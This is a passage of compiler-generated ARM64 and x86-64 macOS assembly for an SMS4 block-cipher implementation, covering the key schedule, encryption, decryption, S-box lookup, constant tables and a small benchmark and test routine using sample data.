#24] b LBB1_1 LBB1_4: ldr x8, [sp, #32] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_10 b LBB1_5 LBB1_5: str xzr, [sp, #24] b LBB1_6 LBB1_6: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #24] subs x8, x8, #32 cset w8, hs tbnz w8, #0, LBB1_9 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_6 Depth=1 ldr x9, [sp, #24] mov x8, #31 subs x9, x8, x9 adrp x8, _ENRK@PAGE add x8, x8, _ENRK@PAGEOFF ldr x8, [x8, x9, lsl #3] ldr x10, [sp, #24] adrp x9, _DERK@PAGE add x9, x9, _DERK@PAGEOFF str x8, [x9, x10, lsl #3] b LBB1_8 LBB1_8: ; in Loop: Header=BB1_6 Depth=1 ldr x8, [sp, #24] add x8, x8, #1 str x8, [sp, #24] b LBB1_6 LBB1_9: b LBB1_10 LBB1_10: ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB1_12 b LBB1_11 LBB1_11: bl ___stack_chk_fail LBB1_12: ldp x29, x30, [sp, #352] ; 16-byte Folded Reload ldp x28, x27, [sp, #336] ; 16-byte Folded Reload add sp, sp, #368 ret .cfi_endproc ; -- End function .globl _SMS4Encrypt ; -- Begin function SMS4Encrypt .p2align 2 _SMS4Encrypt: ; @SMS4Encrypt .cfi_startproc ; %bb.0: sub sp, sp, #416 .cfi_def_cfa_offset 416 stp x28, x27, [sp, #384] ; 16-byte Folded Spill stp x29, x30, [sp, #400] ; 16-byte Folded Spill add x29, sp, #400 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str x0, [sp, #72] str x1, [sp, #64] str x2, [sp, #56] ; kill: def $x8 killed $xzr str xzr, [sp, #48] str xzr, [sp, #40] str xzr, [sp, #32] ldr x8, [sp, #64] lsr x8, x8, #4 str x8, [sp, #24] ldr x8, [sp, #72] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB2_8 b LBB2_1 LBB2_1: ldr x8, [sp, #72] str x8, [sp, #48] b LBB2_2 LBB2_2: ; =>This Loop Header: Depth=1 ; Child Loop BB2_4 Depth 2 ldr x8, [sp, #32] ldr x9, [sp, #24] subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB2_7 b LBB2_3 LBB2_3: ; in Loop: Header=BB2_2 Depth=1 str xzr, [sp, #40] add x0, sp, #80 mov x1, #288 bl _bzero ldr x8, [sp, #72] ldr q0, [x8] str q0, [sp, #80] b LBB2_4 LBB2_4: ; Parent Loop BB2_2 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x8, [sp, #40] subs x8, x8, #32 cset w8, hs tbnz w8, #0, LBB2_6 b LBB2_5 LBB2_5: ; in Loop: Header=BB2_4 Depth=2 ldr x9, [sp, #40] add x8, sp, #80 str x8, [sp, #16] ; 8-byte Folded Spill ldr x0, [x8, x9, lsl #3] ldr x9, [sp, #40] add x9, x9, #1 ldr x1, [x8, x9, lsl #3] ldr x9, [sp, #40] add x9, x9, #2 ldr x2, [x8, x9, lsl #3] ldr x9, [sp, #40] add x9, x9, #3 ldr x3, [x8, x9, lsl #3] ldr x8, [sp, #56] ldr x9, [sp, #40] ldr x4, [x8, x9, lsl #3] bl _SMS4F ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x9, [sp, #40] add x9, x9, #4 str x0, [x8, x9, lsl #3] ldr x8, [sp, #40] add x8, x8, #1 str x8, [sp, #40] b LBB2_4 LBB2_6: ; in Loop: Header=BB2_2 Depth=1 ldr x8, [sp, #360] ldr x9, [sp, #72] str x8, [x9] ldr x8, [sp, #352] ldr x9, [sp, #72] str x8, [x9, #8] ldr x8, [sp, #344] ldr x9, [sp, #72] str x8, [x9, #16] ldr x8, [sp, #336] ldr x9, [sp, #72] str x8, [x9, #24] ldr x8, [sp, #32] add x8, x8, #1 str x8, [sp, #32] ldr x8, [sp, #72] add x8, x8, #32 str x8, [sp, #72] b LBB2_2 LBB2_7: b LBB2_8 LBB2_8: ldr x8, [sp, #48] str x8, [sp, #8] ; 8-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB2_10 b LBB2_9 LBB2_9: bl ___stack_chk_fail LBB2_10: ldr x0, [sp, #8] ; 8-byte Folded Reload ldp x29, x30, [sp, #400] ; 16-byte Folded Reload ldp x28, x27, [sp, #384] ; 16-byte Folded Reload add sp, sp, #416 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function SMS4F _SMS4F: ; @SMS4F .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] str x2, [sp, #24] str x3, [sp, #16] str x4, [sp, #8] ldur x8, [x29, #-8] str x8, [sp] ; 8-byte Folded Spill ldur x8, [x29, #-16] ldr x9, [sp, #24] eor x8, x8, x9 ldr x9, [sp, #16] eor x8, x8, x9 ldr x9, [sp, #8] eor x0, x8, x9 bl _SMS4Lt ldr x8, [sp] ; 8-byte Folded Reload eor x0, x8, x0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _SMS4Decrypt ; -- Begin function SMS4Decrypt .p2align 2 _SMS4Decrypt: ; @SMS4Decrypt .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] str x2, [sp, #24] ; kill: def $x8 killed $xzr str xzr, [sp, #16] str xzr, [sp, #8] ldur x8, [x29, #-8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB4_2 b LBB4_1 LBB4_1: ldur x8, [x29, #-8] str x8, [sp, #16] ldur x0, [x29, #-8] ldur x1, [x29, #-16] ldr x2, [sp, #24] bl _SMS4Encrypt b LBB4_2 LBB4_2: ldr x0, [sp, #16] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _SMS4Encrypt1M ; -- Begin function SMS4Encrypt1M .p2align 2 _SMS4Encrypt1M: ; @SMS4Encrypt1M .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _pData@PAGE add x8, x8, _pData@PAGEOFF stur x8, [x29, #-16] ; 8-byte Folded Spill stur xzr, [x29, #-8] b LBB5_1 LBB5_1: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-8] mov x9, #16960 movk x9, #15, lsl #16 subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB5_3 b LBB5_2 LBB5_2: ; in Loop: Header=BB5_1 Depth=1 adrp x0, _pData@PAGE add x0, x0, _pData@PAGEOFF mov x1, #32 adrp x2, _ENRK@PAGE add x2, x2, _ENRK@PAGEOFF bl _SMS4Encrypt ldur x8, [x29, #-8] add x8, x8, #1 stur x8, [x29, #-8] b LBB5_1 LBB5_3: ldur x8, [x29, #-16] ; 8-byte Folded Reload adrp x9, _pData@PAGE ldr x12, [x9, _pData@PAGEOFF] ldr x11, [x8, #8] ldr x10, [x8, #16] ldr x8, [x8, #24] mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _mainSms4 ; -- Begin function mainSms4 .p2align 2 _mainSms4: ; @mainSms4 .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _pData@PAGE str x8, [sp, #40] ; 8-byte Folded Spill adrp x8, _pData@PAGE add x8, x8, _pData@PAGEOFF str x8, [sp, #48] ; 8-byte Folded Spill mov x0, #0 mov x1, #1 bl _SMS4SetKey ldr x9, [sp, #40] ; 8-byte Folded Reload ldr x8, [sp, #48] ; 8-byte Folded Reload ldr x12, [x9, _pData@PAGEOFF] ldr x11, [x8, #8] ldr x10, [x8, #16] ldr x8, [x8, #24] mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF stur x0, [x29, #-40] ; 8-byte Folded Spill bl _printf ldr x0, [sp, #48] ; 8-byte Folded Reload mov x1, #32 str x1, [sp, #32] ; 8-byte Folded Spill adrp x2, _ENRK@PAGE add x2, x2, _ENRK@PAGEOFF stur x2, [x29, #-32] ; 8-byte Folded Spill bl _SMS4Encrypt ldr x9, [sp, #40] ; 8-byte Folded Reload ldr x8, [sp, #48] ; 8-byte Folded Reload ldur x0, [x29, #-40] ; 8-byte Folded Reload ldr x12, [x9, _pData@PAGEOFF] ldr x11, [x8, #8] ldr x10, [x8, #16] ldr x8, [x8, #24] mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] bl _printf ldr x1, [sp, #32] ; 8-byte Folded Reload ldr x0, [sp, #48] ; 8-byte Folded Reload adrp x2, _DERK@PAGE add x2, x2, _DERK@PAGEOFF stur x2, [x29, #-16] ; 8-byte Folded Spill bl _SMS4Decrypt ldr x9, [sp, #40] ; 8-byte Folded Reload ldr x8, [sp, #48] ; 8-byte Folded Reload ldur x0, [x29, #-40] ; 8-byte Folded Reload ldr x12, [x9, _pData@PAGEOFF] ldr x11, [x8, #8] ldr x10, [x8, #16] ldr x8, [x8, #24] mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] bl _printf bl _SMS4Encrypt1M ldur x2, [x29, #-32] ; 8-byte Folded Reload adrp x0, _pData2@PAGE add x0, x0, _pData2@PAGEOFF stur x0, [x29, #-8] ; 8-byte Folded Spill mov x1, #72 stur x1, [x29, #-24] ; 8-byte Folded Spill bl _SMS4Encrypt ldur x1, [x29, #-24] ; 8-byte Folded Reload ldur x2, [x29, #-16] ; 8-byte Folded Reload ldur x0, [x29, #-8] ; 8-byte Folded Reload bl _SMS4Decrypt mov w0, #0 ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function SMS4CalciRK _SMS4CalciRK: ; @SMS4CalciRK .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str xzr, [sp, #16] str xzr, [sp, #8] ldurb w8, [x29, #-8] ; kill: def $x8 killed $w8 ; kill: def $w8 killed $w8 killed $x8 strb w8, [sp, #7] ldur x8, [x29, #-8] and x8, x8, #0xff00 lsr x8, x8, #8 ; kill: def $w8 killed $w8 killed $x8 strb w8, [sp, #6] ldur x8, [x29, #-8] and x8, x8, #0xff0000 lsr x8, x8, #16 ; kill: def $w8 killed $w8 killed $x8 strb w8, [sp, #5] ldur x8, [x29, #-8] and x8, x8, #0xff000000 lsr x8, x8, #24 ; kill: def $w8 killed $w8 killed $x8 strb w8, [sp, #4] ldrb w0, [sp, #7] bl _SMS4Sbox strb w0, [sp, #3] ldrb w0, [sp, #6] bl _SMS4Sbox strb w0, [sp, #2] ldrb w0, [sp, #5] bl _SMS4Sbox strb w0, [sp, #1] ldrb w0, [sp, #4] bl _SMS4Sbox strb w0, [sp] ldrb w8, [sp, #3] ldrb w9, [sp, #2] orr w8, w8, w9, lsl #8 ldrb w9, [sp, #1] orr w8, w8, w9, lsl #16 ldrb w9, [sp] orr w9, w8, w9, lsl #24 ; implicit-def: $x8 mov x8, x9 sxtw x8, w8 str x8, [sp, #16] ldr x8, [sp, #16] ldr x10, [sp, #16] ldr x9, [sp, #16] lsr x9, x9, #19 orr x9, x9, x10, lsl #13 eor x8, x8, x9 ldr x10, [sp, #16] ldr x9, [sp, #16] lsr x9, x9, #9 orr x9, x9, x10, lsl #23 eor x8, x8, x9 str x8, [sp, #8] ldr x0, [sp, #8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function SMS4Sbox _SMS4Sbox: ; @SMS4Sbox .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 strb w0, [sp, #31] adrp x8, _SboxTable@PAGE add x8, x8, _SboxTable@PAGEOFF str x8, [sp, #16] ldr x8, [sp, #16] ldrb w9, [sp, #31] ; kill: def $x9 killed $w9 add x8, x8, x9 ldrb w8, [x8] strb w8, [sp, #15] ldrb w0, [sp, #15] add sp, sp, #32 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function SMS4Lt _SMS4Lt: ; @SMS4Lt .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str xzr, [sp, #16] str xzr, [sp, #8] ldurb w8, [x29, #-8] ; kill: def $x8 killed $w8 ; kill: def $w8 killed $w8 killed $x8 strb w8, [sp, #7] ldur x8, [x29, #-8] and x8, x8, #0xff00 lsr x8, x8, #8 ; kill: def $w8 killed $w8 killed $x8 strb w8, [sp, #6] ldur x8, [x29, #-8] and x8, x8, #0xff0000 lsr x8, x8, #16 ; kill: def $w8 killed $w8 killed $x8 strb w8, [sp, #5] ldur x8, [x29, #-8] and x8, x8, #0xff000000 lsr x8, x8, #24 ; kill: def $w8 killed $w8 killed $x8 strb w8, [sp, #4] ldrb w0, [sp, #7] bl _SMS4Sbox strb w0, [sp, #3] ldrb w0, [sp, #6] bl _SMS4Sbox strb w0, [sp, #2] ldrb w0, [sp, #5] bl _SMS4Sbox strb w0, [sp, #1] ldrb w0, [sp, #4] bl _SMS4Sbox strb w0, [sp] ldrb w8, [sp, #3] ldrb w9, [sp, #2] orr w8, w8, w9, lsl #8 ldrb w9, [sp, #1] orr w8, w8, w9, lsl #16 ldrb w9, [sp] orr w9, w8, w9, lsl #24 ; implicit-def: $x8 mov x8, x9 sxtw x8, w8 str x8, [sp, #16] ldr x8, [sp, #16] ldr x10, [sp, #16] ldr x9, [sp, #16] lsr x9, x9, #30 orr x9, x9, x10, lsl #2 eor x8, x8, x9 ldr x10, [sp, #16] ldr x9, [sp, #16] lsr x9, x9, #22 orr x9, x9, x10, lsl #10 eor x8, x8, x9 ldr x10, [sp, #16] ldr x9, [sp, #16] lsr x9, x9, #14 orr x9, x9, x10, lsl #18 eor x8, x8, x9 ldr x10, [sp, #16] ldr x9, [sp, #16] lsr x9, x9, #8 orr x9, x9, x10, lsl #24 eor x8, x8, x9 str x8, [sp, #8] ldr x0, [sp, #8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __DATA,__data .globl _pData ; @pData .p2align 3 _pData: .quad 19088743 ; 0x1234567 .quad 2309737967 ; 0x89abcdef .quad 4275878552 ; 0xfedcba98 .quad 1985229328 ; 0x76543210 .globl _pData2 ; @pData2 .p2align 3 _pData2: .quad 19088743 ; 0x1234567 .quad 2309737967 ; 0x89abcdef .quad 4275878552 ; 0xfedcba98 .quad 1985229328 ; 0x76543210 .quad 303174162 ; 0x12121212 .quad 875836468 ; 0x34343434 .quad 1448498774 ; 0x56565656 .quad 2021161080 ; 0x78787878 .quad 305402420 ; 0x12341234 .p2align 3 ; @MK _MK: .quad 19088743 ; 0x1234567 .quad 2309737967 ; 0x89abcdef .quad 4275878552 ; 0xfedcba98 .quad 1985229328 ; 0x76543210 .zerofill __DATA,__bss,_ENRK,256,3 ; @ENRK .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "0x%08x, 0x%08x, 0x%08x, 0x%08x. \n" .zerofill __DATA,__bss,_DERK,256,3 ; @DERK .section __DATA,__data .p2align 3 ; @FK _FK: .quad 2746333894 ; 0xa3b1bac6 .quad 1453994832 ; 0x56aa3350 .quad 1736282519 ; 0x677d9197 .quad 2993693404 ; 0xb27022dc .p2align 3 ; @CK _CK: .quad 462357 ; 0x70e15 .quad 472066609 ; 0x1c232a31 .quad 943670861 ; 0x383f464d .quad 1415275113 ; 0x545b6269 .quad 1886879365 ; 0x70777e85 .quad 2358483617 ; 0x8c939aa1 .quad 2830087869 ; 0xa8afb6bd .quad 3301692121 ; 0xc4cbd2d9 .quad 3773296373 ; 0xe0e7eef5 .quad 4228057617 ; 0xfc030a11 .quad 404694573 ; 0x181f262d .quad 876298825 ; 0x343b4249 .quad 1347903077 ; 0x50575e65 .quad 1819507329 ; 0x6c737a81 .quad 2291111581 ; 0x888f969d .quad 2762715833 ; 0xa4abb2b9 .quad 3234320085 ; 0xc0c7ced5 .quad 3705924337 ; 0xdce3eaf1 .quad 4177462797 ; 0xf8ff060d .quad 337322537 ; 0x141b2229 .quad 808926789 ; 0x30373e45 .quad 1280531041 ; 0x4c535a61 .quad 1752135293 ; 0x686f767d .quad 2223739545 ; 0x848b9299 .quad 2695343797 ; 0xa0a7aeb5 .quad 3166948049 ; 0xbcc3cad1 .quad 3638552301 ; 0xd8dfe6ed .quad 4110090761 ; 0xf4fb0209 .quad 269950501 ; 0x10171e25 .quad 741554753 ; 0x2c333a41 .quad 1213159005 ; 0x484f565d .quad 1684763257 ; 0x646b7279 _SboxTable: ; @SboxTable .ascii "\326\220\351\376\314\341=\267\026\266\024\302(\373,\005" .ascii "+g\232v*\276\004\303\252D\023&I\206\006\231" .ascii "\234BP\364\221\357\230z3T\013C\355\317\254b" .ascii "\344\263\034\251\311\b\350\225\200\337\224\372u\217?\246" .ascii "G\007\247\374\363s\027\272\203Y<\031\346\205O\250" .ascii "hk\201\262qd\332\213\370\353\017KpV\2355" .ascii "\036$\016^cX\321\242%\"|;\001!x\207" .ascii "\324\000FW\237\323'RL6\002\347\240\304\310\236" .ascii "\352\277\212\322@\3078\265\243\367\362\316\371a\025\241" .ascii "\340\256]\244\2334\032U\255\22320\365\214\261\343" .ascii "\035\366\342.\202f\312`\300)#\253\rSNo" .ascii "\325\3337E\336\375\216/\003\377jrml[Q" .ascii "\215\033\257\222\273\335\274\177\021\331\\A\037\020Z\330" .ascii "\n\3011\210\245\315{\275-t\320\022\270\345\264\260" .ascii "\211i\227J\f\226w~e\271\361\t\305n\306\204" .ascii "\030\360}\354:\334M y\356_>\327\3139H" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _SMS4SetKey ## -- Begin function SMS4SetKey .p2align 4, 0x90 _SMS4SetKey: ## @SMS4SetKey .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) cmpq $0, -8(%rbp) je LBB0_2 ## %bb.1: movq -8(%rbp), %rax movq (%rax), %rcx movq %rcx, _MK(%rip) movq 8(%rax), %rcx movq %rcx, _MK+8(%rip) movq 16(%rax), %rcx movq %rcx, _MK+16(%rip) movq 24(%rax), %rax movq %rax, _MK+24(%rip) LBB0_2: movq -16(%rbp), %rdi callq _SMS4CalcRK movq -8(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function SMS4CalcRK _SMS4CalcRK: ## @SMS4CalcRK .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $336, %rsp ## imm = 0x150 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -312(%rbp) movq $0, -320(%rbp) movq _MK(%rip), %rax xorq _FK(%rip), %rax movq %rax, -304(%rbp) movq _MK+8(%rip), %rax xorq _FK+8(%rip), %rax movq %rax, -296(%rbp) movq _MK+16(%rip), %rax xorq _FK+16(%rip), %rax movq %rax, -288(%rbp) movq _MK+24(%rip), %rax xorq _FK+24(%rip), %rax movq %rax, -280(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 cmpq $32, -320(%rbp) jae LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movq -320(%rbp), %rax movq -304(%rbp,%rax,8), %rax movq %rax, -328(%rbp) ## 8-byte Spill movq -320(%rbp), %rax movq -296(%rbp,%rax,8), %rdi movq -320(%rbp), %rax xorq -288(%rbp,%rax,8), %rdi movq -320(%rbp), %rax xorq -280(%rbp,%rax,8), %rdi movq -320(%rbp), %rcx leaq _CK(%rip), %rax xorq (%rax,%rcx,8), %rdi callq _SMS4CalciRK movq -328(%rbp), %rcx ## 8-byte Reload xorq %rax, %rcx movq -320(%rbp), %rax movq %rcx, -272(%rbp,%rax,8) movq -320(%rbp), %rax movq -272(%rbp,%rax,8), %rdx movq -320(%rbp), %rcx leaq _ENRK(%rip), %rax movq %rdx, (%rax,%rcx,8) ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movq -320(%rbp), %rax addq $1, %rax movq %rax, -320(%rbp) jmp LBB1_1 LBB1_4: cmpq $0, -312(%rbp) je LBB1_10 ## %bb.5: movq $0, -320(%rbp) LBB1_6: ## =>This Inner Loop Header: Depth=1 cmpq $32, -320(%rbp) jae LBB1_9 ## %bb.7: ## in Loop: Header=BB1_6 Depth=1 movl $31, %ecx subq -320(%rbp), %rcx leaq _ENRK(%rip), %rax movq (%rax,%rcx,8), %rdx movq -320(%rbp), %rcx leaq _DERK(%rip), %rax movq %rdx, (%rax,%rcx,8) ## %bb.8: ## in Loop: Header=BB1_6 Depth=1 movq -320(%rbp), %rax addq $1, %rax movq %rax, -320(%rbp) jmp LBB1_6 LBB1_9: jmp LBB1_10 LBB1_10: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB1_12 ## %bb.11: addq $336, %rsp ## imm = 0x150 popq %rbp retq LBB1_12: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _SMS4Encrypt ## -- Begin function SMS4Encrypt .p2align 4, 0x90 _SMS4Encrypt: ## @SMS4Encrypt .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $368, %rsp ## imm = 0x170 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -312(%rbp) movq %rsi, -320(%rbp) movq %rdx, -328(%rbp) movq $0, -336(%rbp) movq $0, -344(%rbp) movq $0, -352(%rbp) movq -320(%rbp), %rax shrq $4, %rax movq %rax, -360(%rbp) cmpq $0, -312(%rbp) je LBB2_8 ## %bb.1: movq -312(%rbp), %rax movq %rax, -336(%rbp) LBB2_2: ## =>This Loop Header: Depth=1 ## Child Loop BB2_4 Depth 2 movq -352(%rbp), %rax cmpq -360(%rbp), %rax jae LBB2_7 ## %bb.3: ## in Loop: Header=BB2_2 Depth=1 movq $0, -344(%rbp) leaq -304(%rbp), %rdi xorl %esi, %esi movl $288, %edx ## imm = 0x120 callq _memset movq -312(%rbp), %rax movq (%rax), %rcx movq %rcx, -304(%rbp) movq 8(%rax), %rax movq %rax, -296(%rbp) LBB2_4: ## Parent Loop BB2_2 Depth=1 ## => This Inner Loop Header: Depth=2 cmpq $32, -344(%rbp) jae LBB2_6 ## %bb.5: ## in Loop: Header=BB2_4 Depth=2 movq -344(%rbp), %rax movq -304(%rbp,%rax,8), %rdi movq -344(%rbp), %rax movq -296(%rbp,%rax,8), %rsi movq -344(%rbp), %rax movq -288(%rbp,%rax,8), %rdx movq -344(%rbp), %rax movq -280(%rbp,%rax,8), %rcx movq -328(%rbp), %rax movq -344(%rbp), %r8 movq (%rax,%r8,8), %r8 callq _SMS4F movq %rax, %rcx movq -344(%rbp), %rax movq %rcx, -272(%rbp,%rax,8) movq -344(%rbp), %rax addq $1, %rax movq %rax, -344(%rbp) jmp LBB2_4 LBB2_6: ## in Loop: Header=BB2_2 Depth=1 movq -24(%rbp), %rcx movq -312(%rbp), %rax movq %rcx, (%rax) movq -32(%rbp), %rcx movq -312(%rbp), %rax movq %rcx, 8(%rax) movq -40(%rbp), %rcx movq -312(%rbp), %rax movq %rcx, 16(%rax) movq -48(%rbp), %rcx movq -312(%rbp), %rax movq %rcx, 24(%rax) movq -352(%rbp), %rax addq $1, %rax movq %rax, -352(%rbp) movq -312(%rbp), %rax addq $32, %rax movq %rax, -312(%rbp) jmp LBB2_2 LBB2_7: jmp LBB2_8 LBB2_8: movq -336(%rbp), %rax movq %rax, -368(%rbp) ## 8-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB2_10 ## %bb.9: movq -368(%rbp), %rax ## 8-byte Reload addq $368, %rsp ## imm = 0x170 popq %rbp retq LBB2_10: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function SMS4F _SMS4F: ## @SMS4F .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq %rcx, -32(%rbp) movq %r8, -40(%rbp) movq -8(%rbp), %rax movq %rax, -48(%rbp) ## 8-byte Spill movq -16(%rbp), %rdi xorq -24(%rbp), %rdi xorq -32(%rbp), %rdi xorq -40(%rbp), %rdi callq _SMS4Lt movq %rax, %rcx movq -48(%rbp), %rax ## 8-byte Reload xorq %rcx, %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _SMS4Decrypt ## -- Begin function SMS4Decrypt .p2align 4, 0x90 _SMS4Decrypt: ## @SMS4Decrypt .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq $0, -32(%rbp) movq $0, -40(%rbp) cmpq $0, -8(%rbp) je LBB4_2 ## %bb.1: movq -8(%rbp), %rax movq %rax, -32(%rbp) movq -8(%rbp), %rdi movq -16(%rbp), %rsi movq -24(%rbp), %rdx callq _SMS4Encrypt LBB4_2: movq -32(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _SMS4Encrypt1M ## -- Begin function SMS4Encrypt1M .p2align 4, 0x90 _SMS4Encrypt1M: ## @SMS4Encrypt1M .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq $0, -8(%rbp) LBB5_1: ## =>This Inner Loop Header: Depth=1 cmpq $1000000, -8(%rbp) ## imm = 0xF4240 jae LBB5_3 ## %bb.2: ## in Loop: Header=BB5_1 Depth=1 leaq _pData(%rip), %rdi movl $32, %esi leaq _ENRK(%rip), %rdx callq _SMS4Encrypt movq -8(%rbp), %rax addq $1, %rax movq %rax, -8(%rbp) jmp LBB5_1 LBB5_3: movq _pData(%rip), %rsi movq _pData+8(%rip), %rdx movq _pData+16(%rip), %rcx movq _pData+24(%rip), %r8 leaq L_.str(%rip), %rdi movb $0, %al callq _printf addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _mainSms4 ## -- Begin function mainSms4 .p2align 4, 0x90 _mainSms4: ## @mainSms4 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp xorl %eax, %eax movl %eax, %edi movl $1, %esi callq _SMS4SetKey movq _pData(%rip), %rsi movq _pData+8(%rip), %rdx movq _pData+16(%rip), %rcx movq _pData+24(%rip), %r8 leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq _pData(%rip), %rdi movl $32, %esi leaq _ENRK(%rip), %rdx callq _SMS4Encrypt movq _pData(%rip), %rsi movq _pData+8(%rip), %rdx movq _pData+16(%rip), %rcx movq _pData+24(%rip), %r8 leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq _pData(%rip), %rdi movl $32, %esi leaq _DERK(%rip), %rdx callq _SMS4Decrypt movq _pData(%rip), %rsi movq 